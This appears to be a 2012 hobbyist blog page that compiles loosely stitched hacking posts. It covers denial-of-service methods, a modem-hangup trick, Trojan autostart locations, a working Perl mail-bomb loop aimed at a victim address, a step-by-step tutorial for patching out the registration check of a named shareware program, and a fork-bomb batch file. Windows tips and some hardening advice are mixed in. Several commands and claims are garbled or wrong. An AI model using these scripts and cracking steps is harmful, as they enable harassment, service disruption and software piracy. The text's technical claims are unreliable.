Ads 468x60px

Label 3

Your label here

Sample Text

Sample text

Random Template

Your label here

Popular Template

Recent Post

Label 6

Comments

Label 5

Label 4

Label 1

Your label here

Your label here

Your label here

Label 8

Your label here

Friday 31 August 2012

NETWORK SECURITY



NETWORK SECURITY
Most computes criminals and hackers strike not because of their knowledge but they bloom because of the ignorance the users, system administrator on using their systems and servers and computer networks.
1.There are open ports on which hackers may attack.
2.There are dangerous kinds of attacks on the servers and administrators
3.There are mechanisms of securing window NT server administrator passwords.
This project is based on practical techniques, tacts, of attacking and the concept and mechanism of their attacks.
Thus for stopping the net criminals from intruding into the systems, the system administrator should know the drawbacks, loopholes of the OS, internet, and networking.
These papers give the details of different kinds of attacks that a hacker may onslaught on the administrator. Concepts and techniques of attacks like DOS attack, controlling and disconnecting remote modems,Trojan attasks, mail bombings etc.
.Emphasis is given on the open ports on which the hacker usually attack

ATTACKS ON THE SERVER.

DOS ATTACKS
Denial Of Service attacks( DOS attacks) are very common hacking attack now. It is defined as : An attack on the target system by a malicious attacker to render the normal services offered by it to legitimate users as unavailable or disable services..It involves the launching of an attack that will make the services offred by the target system or normal services offered by the internet or a network system to a legitimate user.
DOS attack can be described as one in which the target system’s memory is is so much clogged that it cannot serve legal users.Or system target is sent so much data files that,which can’t be handled by it and it crashes or reboot.

KINDS OF DOS ATTACK
PING OF DEATH:- Ping is a part of the ICMP protocol i.e. the internet control message Protocol.This is used to troubleshoot the TCP\IP network.
Ping is a command that sends out a datagram to the specified host. This specified host if alive i.e. turned on ,sends out reply or echoes of the same datagram. If the datagram that returns to our computer has the same datagram that was sent, then it means that the host is alive. Therefore ping is basically a command that allows to check if a host is alive or not. It can also be used to determine the amount of time taken for a datagram to reach the host.
Actually it is so deadly so that it can be used to ping a hostname perpetually, that may cause the host to crash. When a host receives a ping signal, it allocates some of its resources to to attend to or to echo backthe datagram. Now, if a host is pinged perpetually, then a time will come when all resources of the host are used and the host either hangs or restarts.
Due to ping’s deadly nature,most shall account ISP hide the ping utility.
It can be find out by using the command :
Whereis Ping
It is usually hidden in /usr/etc.
The flood ping which pings a host perpetually is:
Ping –t hostname
Ping –a can be usedto resolve addresses of the hosname.
We can even ping ourselves.The IP 127.0.0.1 is the local host. This means that when we connect to 127.0.0.1 , we actually connect to our own machine. Therefore to ping ourselves perpetually, we give the command:
Ping –t 127.0.0.1
However the flood ping no longer works as most of the OS have been updated.
The following ping command creates a giant datagram of the size 65,510.
C:\windows>ping –165510
This might hang the victim’s computer.
FPING UTILITY: this tool allows to send mass echo request to a huge number of systems.The normal ping sends out echoes one by one to eachj system on a network. Against this, fping sends mass echoe requests to the entirenetwork at a single time. Hence it is more efficient.
SYNFLOOD ATTACK:- SYN flooding is flooding the target system with so many connection requests, that all it’s mamorr gets hogged up in trying to establish proper connections with allthese requests .In effect, since all the memory of the target system is used up in trying to establish connections, the target system is unable to provide services even to the legitimate users.The SYN attack TCP/IP in three way handshake.whenever a client wants to establish a connections with a host,three steps takes place,known as three steps handshake:
1. The client system sends a SYN packet to to the remote host.
Client---------------SYN packet---------------Host
2. The remote host replies with a SYN/ACK packet to the client.
Host----------------SYN/ACK packet-------------Client
3. The client replies with an ACK packet,acknowledging the packet sent by the hostin step 2.
Client------------------ASK----------------------Host.
The above is known as three way handshake and only if the above are completed, a complete TCP/IP connection is established between a source and destination.
In SYN attack several SYN packets are sent to the server but all have a bad source IP address.When a server receives these SYN packets with bad IP addresses,it tries to respond to each one of them with a SYN ACK.Now the target system waits for an ACK message to come from the bad IP address.But as the IP doesn’t exist,the target system never receives the message.Hence these requests occupy large number of resources of the target system.As a result,due to large no of requests,the memory of the system gets hogged up and it becomes unable to respond to the legal users.Thus the server eventually crash, hang or reboot.
In accordance with the rules of TCP\IP,after a certain time has passed, a timed out takes place and the connection requests Queued up by the target system are discarded and thus a part of the hogged up memory is freed.Therefore in SYN flood attack, the attacker keeps on sending connection requests at a faster rate then the timed out take place.Thus the attacker keeps the target system hanged.
To know that we have been attacked,type the command:
C:windows>netstat –a
This will show as:
Active Connections
Proto Local Address Foreign Address State
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya *.* ESTABLISHRD
If the above command shows a lot of connections in the SYN_RECEIVED stata,then probably the system is under SYN attack. The connections under ESTABLISHED state are legitimate connections.
CONTROLLING AND DISCONNECTING REMOTE MODEMS.
Let our IP address is xx.xx.xx.xx and the server we are connecting to has the IP yy.yy.yy.yy.Let us assume a single data packet and send it to yy.yy.yy.yy,then the packet will take the following path to reach the destination.
Data packet at source-----------Modem of source-------------Router------------
Modem of Destination---------------Destination Server.
Thus, each data packet goes VIA MODEM, both at the source and the destination.Thus all data goes through modems and this data may be a command.
A syatem controls a modem by issuing the commands which are generally referred as AT commands. The word AT precedes all modem commands with a few exceptions.
An example of the AT commands is that is issued when you dial into your ISP.When you click on the ‘connect’ button, the DUN software sends the following command to your modem:
ATDT and ATDP command followed by the number you want to dial and enter.
To Issue command to the modem, it should be in the command mode.
A modem is always either in the command mode or in the online mode.When the system boot up, the modem, by default, is in the command mode.When the modem is in the command mode, then the AT commands are considered to be commands, while in the online mode all commands are considered to be data packets.
When we are connected to the internet, the modem is in the online mode, and thus can’t accept any command.This means that if we know the IP address of a person,and send a modem command string, the modem will only treat it as normal data and will not react to it.Thus the modem has to be switched in the commend mode.
When the modem is in the online mode, it can be brought to the command mode by sending it the escape characters.i.e.+++.Pressing the escapes character will switch the modem to the command mode and it will start reacting to the AT commands.
To return the modem in the online state, ATO command is given.
Thus if we know the IP address of a person, and we send the +++ string to it followed by the AT modem commands, we can practically control the remote modems.We can do anything with the modem.
H0 is the AT command that instructs the modem to hangup or disconnect.
If we want to disconnect our own modem, then we will issue the following command:
+++ATH0
This command switches the modem from the online mode to command mode and then send it the H0 command which disconnects the modem.
If we send this command to the remote modem, it will disconnect that too.
NOTE:The command ATH0 don’t work on all modems.
The way the command ATH0 works is that it hides escape/control sequences in an ICMP echo request packet.( it contains the string +++ATH0).Actually the string +++ sends the modem into escape mode, and if the guard time on the modem is set very low it will go into command mode instantaneously and we can issue it the AT commands.The system receives the echo request package with a new timestamp and checksum,destination/source hosts and return it to
sender. When it returns, the string is send to the modem and thus execution of the command takes place.There are few conditions that must be met for it to work. These are:
1. The target computer must not filter ICMP echo requestsand must know how to reply to one if it gets one.
2. The target computer must be using a modem
3. The target computer must have a vulnerable modem (i.e. guard time must be set nvery low) .
2. Spoofed ( i.e. with bad IP ) packets must be sent to the target computer, otherwise the target computer will know that from where these are coming from.
TROJAN/KEY LOGGER ATTACKS
Trojan is a tool which when installed in a system,can be misused for malicious purposes by the attacker.They are capable of doing a lot of harm to the target computer.
Almost all Trojans are made up of:
1.THE SERVER PART:This part of the Trojans should be installed and be running on the target system.
2.THE CLIENT PART:This part of the Trojan is installed and running on the attacker’s computer.
The Trojans attack in the following way:
1. The attacker tries to install the server part of the Trojan on the target system, iny of the following methods:
(a). Sending the Trojan disguised as a normal file through ICQ or any other instant messaging software.
(b). Installing the Trojan on the target computer manually.
©. By Trickery:In this method, the attacker either hides the Trojan server part into normal.EXE file.This file is chosen by the attacker on the basis this victim finds this file as useful and he installs this infected file.
2. Once the attacker has been able the Trojan on the server system,it binds a particular port on the target computer and the attacker listens for the connections.Each Trojan has a particular port to which it binds.
3. As soon as the attacker listens for the connections, he tries to know the IP address of the target computer.
4. As soon as the attacker gets the IP address of the target system,he uses the client part of the Trojanof his system and thus the attacker becomes able to control the target system.Thus, using this Trojan, the attacker can enjoy full control on the target system.
DETECTION OF A TROJAN:
Almost all types of Trojans are loaded into the memory each time the window boots up.There some common references or the locations where the are known or hiding are:
(A). THE START UP FOLDER: c:\windows\startmenu\programs\startup
This folder is actually stored in the registry:
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shell folders]
Common startup=c:\windows start menu\programs startup.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\user shall folders]
Startup= c:\windows start menu\programs startup.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\ shall folders]
Startup= c:\windows start menu\programs startup
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\user shell folders]
Common startup=c:\windows start menu\programs startup.
(B). SYSTEM FILES: The two system files,win.ini and system.ini are also executed
(c). BATCH FILES: The two batch files, autoexe.bat and winstart.bat arev also executed.These batch files may contain the malicious commands.
(D). THE WINDOW REGISTRY: The Trojan programs may also reside in the window registry and thus the following registry are executed when window boots.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runservices]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runservicesOnce]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runOnce]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\RunOnce]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\RunServices.
Thus by monitoring these and other places,we can detect the presence the Trojan viruses.

MAIL BOMBING
Mailbombing means to send a huge amount of emails to a single email account so that the maximum space of the account is filled and the user can’t receive any further email and making it difficult for the user to read the existing emails.
Mailbombing is of two types:
1. THE MASS MAIL BOMBING METHOD: In this kind of attack the user’s account is filled with huge number of the emails.There are mail bombing softwareswhich allow to send a particular message using a SMTP server.These softwares can be maid easily ib pearl.
e.g. #!/bin/pearl
$mprogram=’/usr/lib/sendmail’;
$victim=’victim@hostname.com’;
$var=0;
while($var<1000)
{
open (MAIL,”|$mprogram$victim”)||die”can’t open mail program”;
printMAIL “Mail Bombing”;
close(MAIL);
sleep(4);
$var++;
}
This program will send 1000 emails to the target account.
LIST LINKING: In this mailbombing the target is subscribed to thousands of mailing list. This kind of mail bombing is more effective as the server has to unscribing himself from this long mailing list.
The List Linking mailbombing is done by the use of mail bombing software.This software asks the target email address , the address of the SMTP server,the forged email address from which the mail bomb is to appear.
This software subscribes the victim again and again, abd thus he has a lot of work to do. He even has to miss his incoming important emails and existing emails.
In this type of attack, don’t download all the massages and deleting. Instead, log on to the POP port of your mail server and delete the useless massages using POP commands.And by reading the header , the mailbomber can be easily traced.

PORT SCANNING

There are basically two kinds of ports—Physical(hardware) and Virtual(software).
Hard ware are the slots behind the CPU to which other system davices are connected.A software port is a virtual pipe through which informaion flows. A particularsystem can have a large number of ports. All ports are numbered and on each port a particular service or software is running.
Port scanning is the first step in finding a hackablr server, with a hole or any vulnerability.
If we are to hack our ISPserver, then we first have to find out the hostname of the server run by the ISP.Now each server can have a large number of open ports and it will take days to manually go and search the services running on each port.This is where the port scanning utilities come in.
Tools like SATAN allow to find out the list of the open ports and the services running on them and also the vulnerability of the target system.
Another thing we must be careful about port scanning the ISP is that most port scanners are easily traceable.If caught port scanning on the host, then this is a sure symbol of hacker’s activity.
To find out the list of the open ports on our own system,we have to give the command:
C:\windows>netstst –a
The ports are of three kinds:
1. The well known ports:These ports are the ports which are numbered from 0 to 1023.This range of the port is bound to the sevices running on them. Thus each port has a specific service running on it.
Eg. The FTP runs on Port 21.
3. The registered port number:These ports are from 1024 to 49151.This range of the port is not bound to any specific service. Actually networking utilities like browser email opens a random port within this region and starts the communication with the remoye server.A port number within this region enables us to surf the net .
These ports are simply open so that our software applications can do the desired work.They act as a buffering transferring packets received to the application and vice versa.Once we close our application, these ports are automatically closed.
3. THE DYNAMIC/PRIVATE PORT NUMBER.:These ports are the ports from 49152 to 65535. This range is rarely used and is mostly used by Trojans.
Eg. Sun starts its RPC port at 32768.

BLOCKING THE PORTS:
Thus, this basically shows us to what to do if the netstat command gives us a couple of open ports on our system or server.
1. Check the Trojan list and compare if the open port number matches any Trojan list. If it does ,get a Trojan remover and remove the Trojan.
2. WE can also remap the ports. This is an efficient method to secure our open ports. The remappng is done by the fact that instead of running a service on a well-known port,where it can be easily exploited, it better to run it on a not so known port. Thus a hacker will find it more difficult to find that service.This method is known as remapping.
3. ETHERPEEK is an excellent sniffing software,which can easily trace the port scanner.
4. NUKE NABBER, a window freeware, claims to be an excellent port blocker.
5. There are other utilities such as PORT DUMPER, which can fake daemons (services) like Telnet, Finger printing, etc.

SECURING WINDOWS NT ADMINISTRATOR PASSWORDS
(Source : www.ntbugtraq.ntadvice.com/default.asp )
The NT Security Access Manager (SAM) is the security manager of the passwords of the windows NT Administrator. The SAM stores the list of the usernames of all accounts and their respective passwords in the encrypted form of all local users on that particular domain. Cracking the encrypted passwords stored by SAM is all needed to control the entire network.
By default the backup of SAM is stored in the file %systemroot%\repair\sam._.And by default , This directory allows everyone to read access. Thus it is possible to retrieve the hashed(encrypted) passwords from the file directly. There it is required not to give access to the root directory of the %systemroot% drive against having any system file manipulated.
Recently the algorithm of reversing the NT user hashed passwords into NT user ID’s passwords was published.
This created a scary concern over the relative security of the Window NT Administrator System.
Therefore RECOMMENDATIONS to secure the file %systemroot%\repair\sam._ [this file stores the backup of SAM(SAM stores the passwords),and hence one of the most important file]. These are:
TO SECURE THE %systemroot%\repair\sam._ FILE:
By default, the SAM._ and \repair directory has the following permission:
Administrators; SYSTEM : Full Control
Everyone: Read
Power Users: Change
1. From within Explorer, highlight the SAM._ file, right click, choose properties,security,permissions. Remove all privileges from this file.
2. From DOS prompt, execute the following;
Cacls %systemroots%\repair\sam._ /D Everyone
This will deny the group Everyone permission to the file, ensuring that no other permission can override the file permission.
3. Whenever you need to update your ERD(Emergency Repair Disk), first execute the following at DOS;
Cacls %systemroot%\repair\sam._/T/G Administrators:C
This will grant Administrators change permission to update it during the ERD update. (SAM database is backed up whenever ERD is updated).
4. Once the ERD has been updated, execute the following at DOS;
cacls%systemroot%\repair\sam._/E/R Administrator
This will once again remove the permission for Administrator.
Hence the file is fully secured.

All about Cracking


How to crack software
How to crack software – a beginner's tutorial!

Introducion:

I have read many cracking tutorials lately. Frankly speaking, I myself learned cracking from tutorials (and some book, but
this doesnt really matter). The majority of the cracking tutorials out there have a few disadvantages: either they are too long
and contain a lot of garbage, or they are too short, and don't contain the basics.


I decided to write a tutorial which will not have those two disadvantaged.

Anyway, I divided the tutorial into 3 parts:

Part 1: Introduction, tools and The basics of cracking.

Part 2: Practical training, using W32Dasm, and HIEW

Part 3: Key-generators.

Welcome to the first part. ;-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. What is Cracking?

For me, cracking is:
"Letting a program, which is on your computer behave as you want it to behave and not behave as someone else (the
programmer) wants"

As INTERN said: "Hey, it is your stuff right? your numbers, your bits, you should be able to do anything you wish to do with it "

Actually, I agree to this.

So cracking is modifying your programs, and making them work they way you want them to. U can get a free demo
program, crack it, and use it. BUT!!!! I repeat, if you crack a program, and start selling the cracked version or even offering it for free, it is a crime!

After reading those three tutorials (this is the first one in thsi series), you will feel the power you have in your hands (I mean, in your head).

well, let's get started?

3. Tools

There are very few tools you need by now... It is very easy to find them over the web, cause they are quite popular:

The first one is " Win32 Disassembler ", which is also know as W32Dasm.

The Win32 Disassembler allows you to:

1.Disassemble files - translate the program to it's assembly origin, or machine code.
The file types which can be disassambled in Win32 Disassembler:
exe, 386, com, cpl, drv, dll, fon, mpd, ocx, vbx, vbx and sys.
2.Load the program proccess and trace the program. 3.Browse the disassembled file and go to any code location that you want. 4. Find text. 5.Execute, insert or remove jumps and calls.
6.Import and export functions.
7.Show a HEX display of a code area.
8.Show the list of the STRINGS, DIALOGS and REFERENCES.
9.Save the Disassembly source in text format.

Well, u can get it in almost any cracking site, but I'll give you some URLs:

1.http://wowsites.com/meiner/w
32dsm89.zip

The second tool you need is Hiew, which is also known as Hacker's View. The Hacker's View Tool allowes you to:

1. Disassemble files.
2.Make changes in the disassembled file, such as: write commands, modify commands and reassemble the file.
3.View the file in ASCII, Hex or assembly mode.

You can also download an excellent program for cracking called Soft-ICe. Anyway, we won't need it in this part of the tutorial. Anyway, here are some URLs for Soft-ICe.

link - http://www.plunder.com/Softi
ce-Insta...load-83770.htm

4. The Main steps of cracking


There are 7 steps in the process of cracking:

1.Run the program you want to crack and learn it's standard behavior. Try to locate strings and keywords, try to enter the password and see how the program responds.
2.Open up the program with the W32Dasm and disassamble it.
3.Find typical and common strings in the disassembly that appeared in the program. In most cases, you have to look
for keywords such as: password, name, date, expired, time limit, wrong, entered and so on.
4.Find and observe the password generator, find the learn protection routine and the API calls.
5.Try to understand the jumping mechanism of the protection.
6.Open up the program in HIEW. Change the jump of the flow control to it's oposite jump command, or nop it out.
7.Run and see how the change you have made in the original program affected it. Feel the power you have, the
power of cracking, letting programs behave as you want them to.

Learn those steps very well, until u dream of them, u will use them in every program you crack.

5. Basic terms in Assembly

A. Registers:

Registers are variables which are stored in your processor. The processor uses these variables for basic mathimatical and
logical operations. The mostly used registers are: eax, ebx, ecx and edx. Sometimes you will see edi, esi, esp, ebp. There
are three types of registers: 32Bit registers, 16Bit registers and 8Bit registers. The 32Bit registers start with e, such as eax.
There are 16Bit equivalents of these registers. The only Difference between the two types is the veriable size. These
registers are: ax, bx, cx, dx, di, si, sp, bp. There are also 8 bit registers. Tthe 8Bit registers are: al, ah, bl, bh, cl, ch, dl, dh. l -
means the lower 8 bits of the 16Bit register. h - means the higher 8 bits of the 16Bit register. Here the l stands for the lower
and h for the higher 8 bits of a 16 bit register.

B. Flags:

Flags are Boolean variables (get 0 or 1 values). Flags are used by the processor for internal logical and mathimatical
operations, in order to get the result of the operation. The most important flag is the Zero Flag, which can get zero or non-
zero (1) values.

C. Code Flow

When you are analyzing a piece of code, you must understand that the processor is actually quite stupid, and all it does is
to simply follow the basic instructions, line by line. It does anything the code tells it to do, and cannot do anything that is not
written in the code (unless it has been run over by a herd of cows and abducted by aliens). This is why you have to think like
the processor when you're analyzing a piece of code, and to act like it (just don't get used to it! Inhale, exhale, inhale,
exhale... nevermind, stupid joke) You have to do everything the processor does, you have to compare registers and
variables, execute jumps and calls, calculate Basic mathimatical operations, store and load register values and adresses,
and so on... The processor has an instruction pointer especially for this, which is also called IP (it has nothing to do with IP
addresses in the Internet Protocol, trust me). Using the instruction pointer, the processor points to the instruction that is
about to be executed. The processor also has and executes instructions which change the code flow.
These instructions can be function calls, any other routine calls, jumps, conditional jumps, which depend on the zero flag,
negative conditional jumps...

6. Conclusion

In this part of the tutorial we have learnt the meaning of the word cracking. Making programs behave as you want them to,
and not the way the programmer wants them to. We have also learnt about the basic and the popular tools of cracking:
W32Dasm, Hiew and SoftICE. And finally we have learnt the 7 main steps of cracking.
Now, Before you go to the next chapter, you have to learn these 7 steps and download the tools mentioned above, because we can't go on to the next chapter unless you have those tools and know the steps

Part 2

0. Introduction:

In this part, the second part of the cracking tutorial, you will learn to use the most important tools of the common cracker: W32Dasm and HIEW. You will also learn to crack some simple programs.
The tutorials are divided into 3 parts:

Part 1:Introduction, tools and the basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW.
Part 3: key-generators

1. Disclaimer:


I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. The main steps of cracking

You have already seen these steps in the previous part of the tutorial, but it's very important to know them. Remembering these steps and following them is 40% of the way towards success in cracking the program!!!

There are 7 steps in the cracking process:

1.Run the program you want to crack and study it's behavior. try to locate strings and keywords, try to enter the password and see how the program responds.
2.Open the program with the W32Dasm and disassemble it.
3.Find typical and common Strings in the disassembly that appeared within the program.
in most cases, you have to look for keywords such as: password, name, date, expired, Time limit, wrong, entered and so on.
4.Find and observe the password generator, find the learn protection routine and the API calls.
5.Try to understand the jumping mechanism of the protection.
6.Open the program in Hiew. change the jump of the flow control to it's opposite jump command, or NOP it out.
7.Run and check how the change you have made in the original program affected it.
Feel the power you have, the power of of cracking, making programs behave the way you want them to.

Learn those steps very well, until u dream of them, u will use them in every program you crack.

3. Additional programs you need to have for this part of the tutorial

By now, in this part of the tutorial, you have learnt the main steps of cracking. Now, you are going to crack your first program.

But before that, you need to get a little program called: "Sweet Little Piano" You can download it from:http://www.ronimusic.com/

Now, when you have the program, let's start!

4. Cracking the first program (Sweet little Piano)

Now we will follow each step and crack the program:

Step 1: Running the program:

Well, Run it! Duh... :-)

Well, what do we see here..... The program opens two text files. Also we see "Unregistered Shareware" on the caption bar...
Now let's open the Help menu for any registration options... Humm, what do we see here now...
oh, it's a password option... Well, select it and enter something (don't hope it will be right :-)). To see what happens... Click
OK.. Hmm, nothing happens.... Maybe it accepted it? Hmm.. no way... the caption bar still says Unregistered... Ok close it...
bah ... more text files ... and a notification that the settings are not saved in the unregistered version ... well ... kind of
irritating those text files! Let's fix it :-)

Step 2: Disassemble the program:

Disassemble the program. Good, small is fast :-) Always.... Now, we don't have any strings that pop up when we want to
register something... Let's browse for strings like registered, unregistered, the string about the unsaved settings. Hmm...
evaluation time left ... password.txt.... passworddialog.... sweet little piano - Unregistered <<-- looks like our caption bar ;-)
go on...Thanks for registering ... cool! So it thanks you anyway :-) Let's jump to that place ... Double click on it an we will pop
right on top of the registration routine...

Step 3: Analyzing the protection routine.... / Understanding the jumping Mechanism...

Let's analyze the protection routine.


PasswordDialog ... a call to GetDlgItemTextA ... another call.... a test... and depending on the test a je.... The je jumps over the thank you ... And just ends the dialog box ... without telling you that you entered something wrong... So this is right ... we did indeed not see that we typed something wrong ... but apparently we are supposed to see if we type something right

Again execute the je jump, and look where it goes to ... return from the jump.... Now lets try to rewrite what goes on here...

call ShowPasswordDialog
call GetEnteredText
call IsEnteredTextGood
test value in eax
je QuietExit

ShowThanksForRegistering

QuietExit:

the source code must have looked like this :

GetDlgItemText(_ID_Serial);
if (EnteredTextGood) ShowThanksForRegistering

// else nothing....

This is another interesting piece of code.... test eax, eax ... this assembler instruction tests if the value of eax is equal to
itself ... if it is it is equal ... so a je instruction jumps ... if it is not equal, it does not jump.... To crack this program we can change the je instruction into two nop instructions... and we are done...

We have seen here, that the call has put a value in eax.... something which is not equal to zero or a zero... In our previous
example we saw that the called Is_Serial_Valid call set some value in memory ... Here we see that the called
Is_Serial_Valid call sets the eax register of our processor to some value....

Step 4: Changing the original program...

So modify it :-)

1. Open Hiew. 2.Open the file within Hiew.
3.Find the Adress of the line in W32Dasm (it's on the status bar beginning with '@').
4.Press F5 in Hiew.
5.Enter the address you have found in (4) and press ENTER.
6.Press F3 - for activating the write option.
7.Press F2 - to change the instruction.
8.Replace the command by 'NOP' (without quotes), which means NO OPERATION.
9.Now a new command appeared in the next line.
10.Replace it by NOP too.
11.If another new instruction hasn't appeared, Press F9 to update the file.
12.Press F10 to exit.
13.Run the program and see the result.

Anti- Shortcut Virus


If your flash drive(pen drive) is affected with shortcut viruses..then follow this steps

Click on "Start" -->Run.

Here I assume your flash drive letter as G:

Enter this command.

attrib -h -r -s /s /d g:\*.*

Copy the above command and paste it in Run .

Note : Don't forget to replace the letter g with your flash drive letter.

Now press "Enter".

Now check for your files in Flash Drive.

Smallest Virus


A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.




A Fork bomb is considered to be the smallest writable virus in the batch language and it is capable of being annoying and if launched on a home computer however on a server will probably result in a crash.
A fork bomb creates two instances which each create two instances and so on..the processes recursively fork, this "forks" the processor and jamm it completely until a crash occurs.
Here is how to make it
open up notepad and type:
%0|%0
and save it as fork.bat Yep..its a virus of just 5 characters :P .
On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt .

10 ways to a better Security


(1)always scan your file at http://scanner.novirusthanks.org/ Do not distribute the sample or http://www.virustotal.com/

(2) sandbox everything and use Anti-Malware

(3) make a vmw = vmware workstation

(4)use a keyscrambler in your vmware

(5)use firefox always delete Cookie and history after closing never save password

(6)if u are going to hack use a vpn- virtual privet network

(7) if your buying some software form a user make sure u research him
read his threads ask a friend. read the scam page.send the money as a gift on paypal.

(8)if something looks to good 2 be free well its not its most likely backed door

(9) never download form a telnet Nono= ppl with 10 post

(10) add a firewall in your vmware workstation and anti virus guard

(11) add a firewall anti virus guard on your pc outside your vmware workstation use a scrambler and a sandbox everything

(12) buy a 5tb External Hard Drive and back up everything ((scan file)) b4 adding

(13) one of the important factors in keeping tools undetected from anti viruses

How To Lock Your Computer With USB Drive


How To Lock Your Computer With USB Drive
Tired of people starting your computer when you are not around and messing up custom settings? Wouldn’t it be cool if you could lock your computer by just removing your USB stick from it? I’ll show you how you can use your USB stick, Flash Drive or Pen Drive what ever you call it to lock your computer, among other things…

Boot Lock
This trick will allow you to use your USB to BOOT into Windows. If someone tries to start the computer without your USB stick, it will display boot errors. Before begin, you playing with the BIOS and boot files of your computer may result in you not being able to boot into your Windows partition; so continue at your own risk! Things you need: A 64MB or larger sized USB Stick, Windows Recovery Disk (just in case).

 Unhide hidden and protected files : Go to Tools > Options > View, check Show hidden files and un-check Hide protected system files.

From the drive where Windows is installed (normally C:\), copy the files boot.ini, ntdlr and NTDETECT.COM to your USB Stick.
Now, we need to go into your BIOS, so restart the computer and keep jabbing [F8] as soon as the computer starts.
Once in the BIOS, enable USB Drive as the first boot device. You might have to enable USB Legacy  Support on older BIOSes.
Restart your computer, if all goes well, you should be able to log into Windows. If not, then unplug the USB Stick, return to the BIOS and change the First Boot device to your hard disk drive and repeat the steps above.
Once you are logged into Windows, go to your Windows drive and rename boot.ini to boot.bak.
To check if you have setup everything correctly, eject your USB stick and reboot the computer. You should get error messages on the screen such as Invalid Boot.ini” or “Windows could not start”.

All About IP address part-2


There are two ways two change your IP on Windows. The easy way, and the hard way. Ill discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it is, if your NIC (Network Interface Card) supports cloning your MAC Address. If this is the case then you go to.

Start > Control Panel > Network Connections

Right Click on your NIC card and goto properties. Then click the button labeled Configure. It should bring up another form. Click on the advanced tab. You should see under Property "Locally Administered Address" or "Network Address". Click the radio button next to the text box, and type in your new MAC address. (note you do not use the "-" when you enter your no MAC Address.

To check and see if it worked or not go to

Start > Run > and type in "cmd"

When the terminal comes up issue the command.

ipconfig /all
-----------------------------------------------------------------------------------------------------------------------------------------------

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in "cmd"

Once the terminal comes up type in

"net config rdr"

It should bring up alot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in "regedt32"

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the "NetCfgInstanceId" Key with the number you wrote down earlier. Once you find a match double click on the key "NetworkAddress" and change the value to your new MAC address. Hit ok and reboot your system.




There r several ways u can determine ur IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that u can send the information to a text file (IPCONFIG /ALL > c:\ip.txt)
But sometimes the window shows show much information u need to scroll around to fine it.

VIEW STATUS

Control Panel / Network Connections / Double click the icons 4 ur network (If the network has an icon in the system tray u can also just double click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When u try nd send pictures through e-mail, u should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If u would like to create an icon to suspend ur computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name u want
Now when u click on that shortcut, ur computer will shutdown nd suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, u r only allowed to create administrators or limited users.
If u want to create

Right click on My Computer
Manage
Local Users nd Groups
Users
Right click on the user u want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here u see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::






some more
Determining Which Services r Associated with SVCHOST

Since so many critical services r run with each svchost,
You can see which ones r being used by opening a cmd prompt nd running:

tasklist /svc /fi "imagename eq svchost.exe"

Note: This is available only with XP Pro
:::::::::::::
Identify Faulty Device Drivers

If u r having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verfier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers u want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If ur computer stops with a blue screen, u should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If u want to see a list of installed drivers, u can run the driverquery program
There r a lot of available switches to view different types of information.
On use can be to export to a CSV file 4 viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv

All about IP Address part-1


In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.

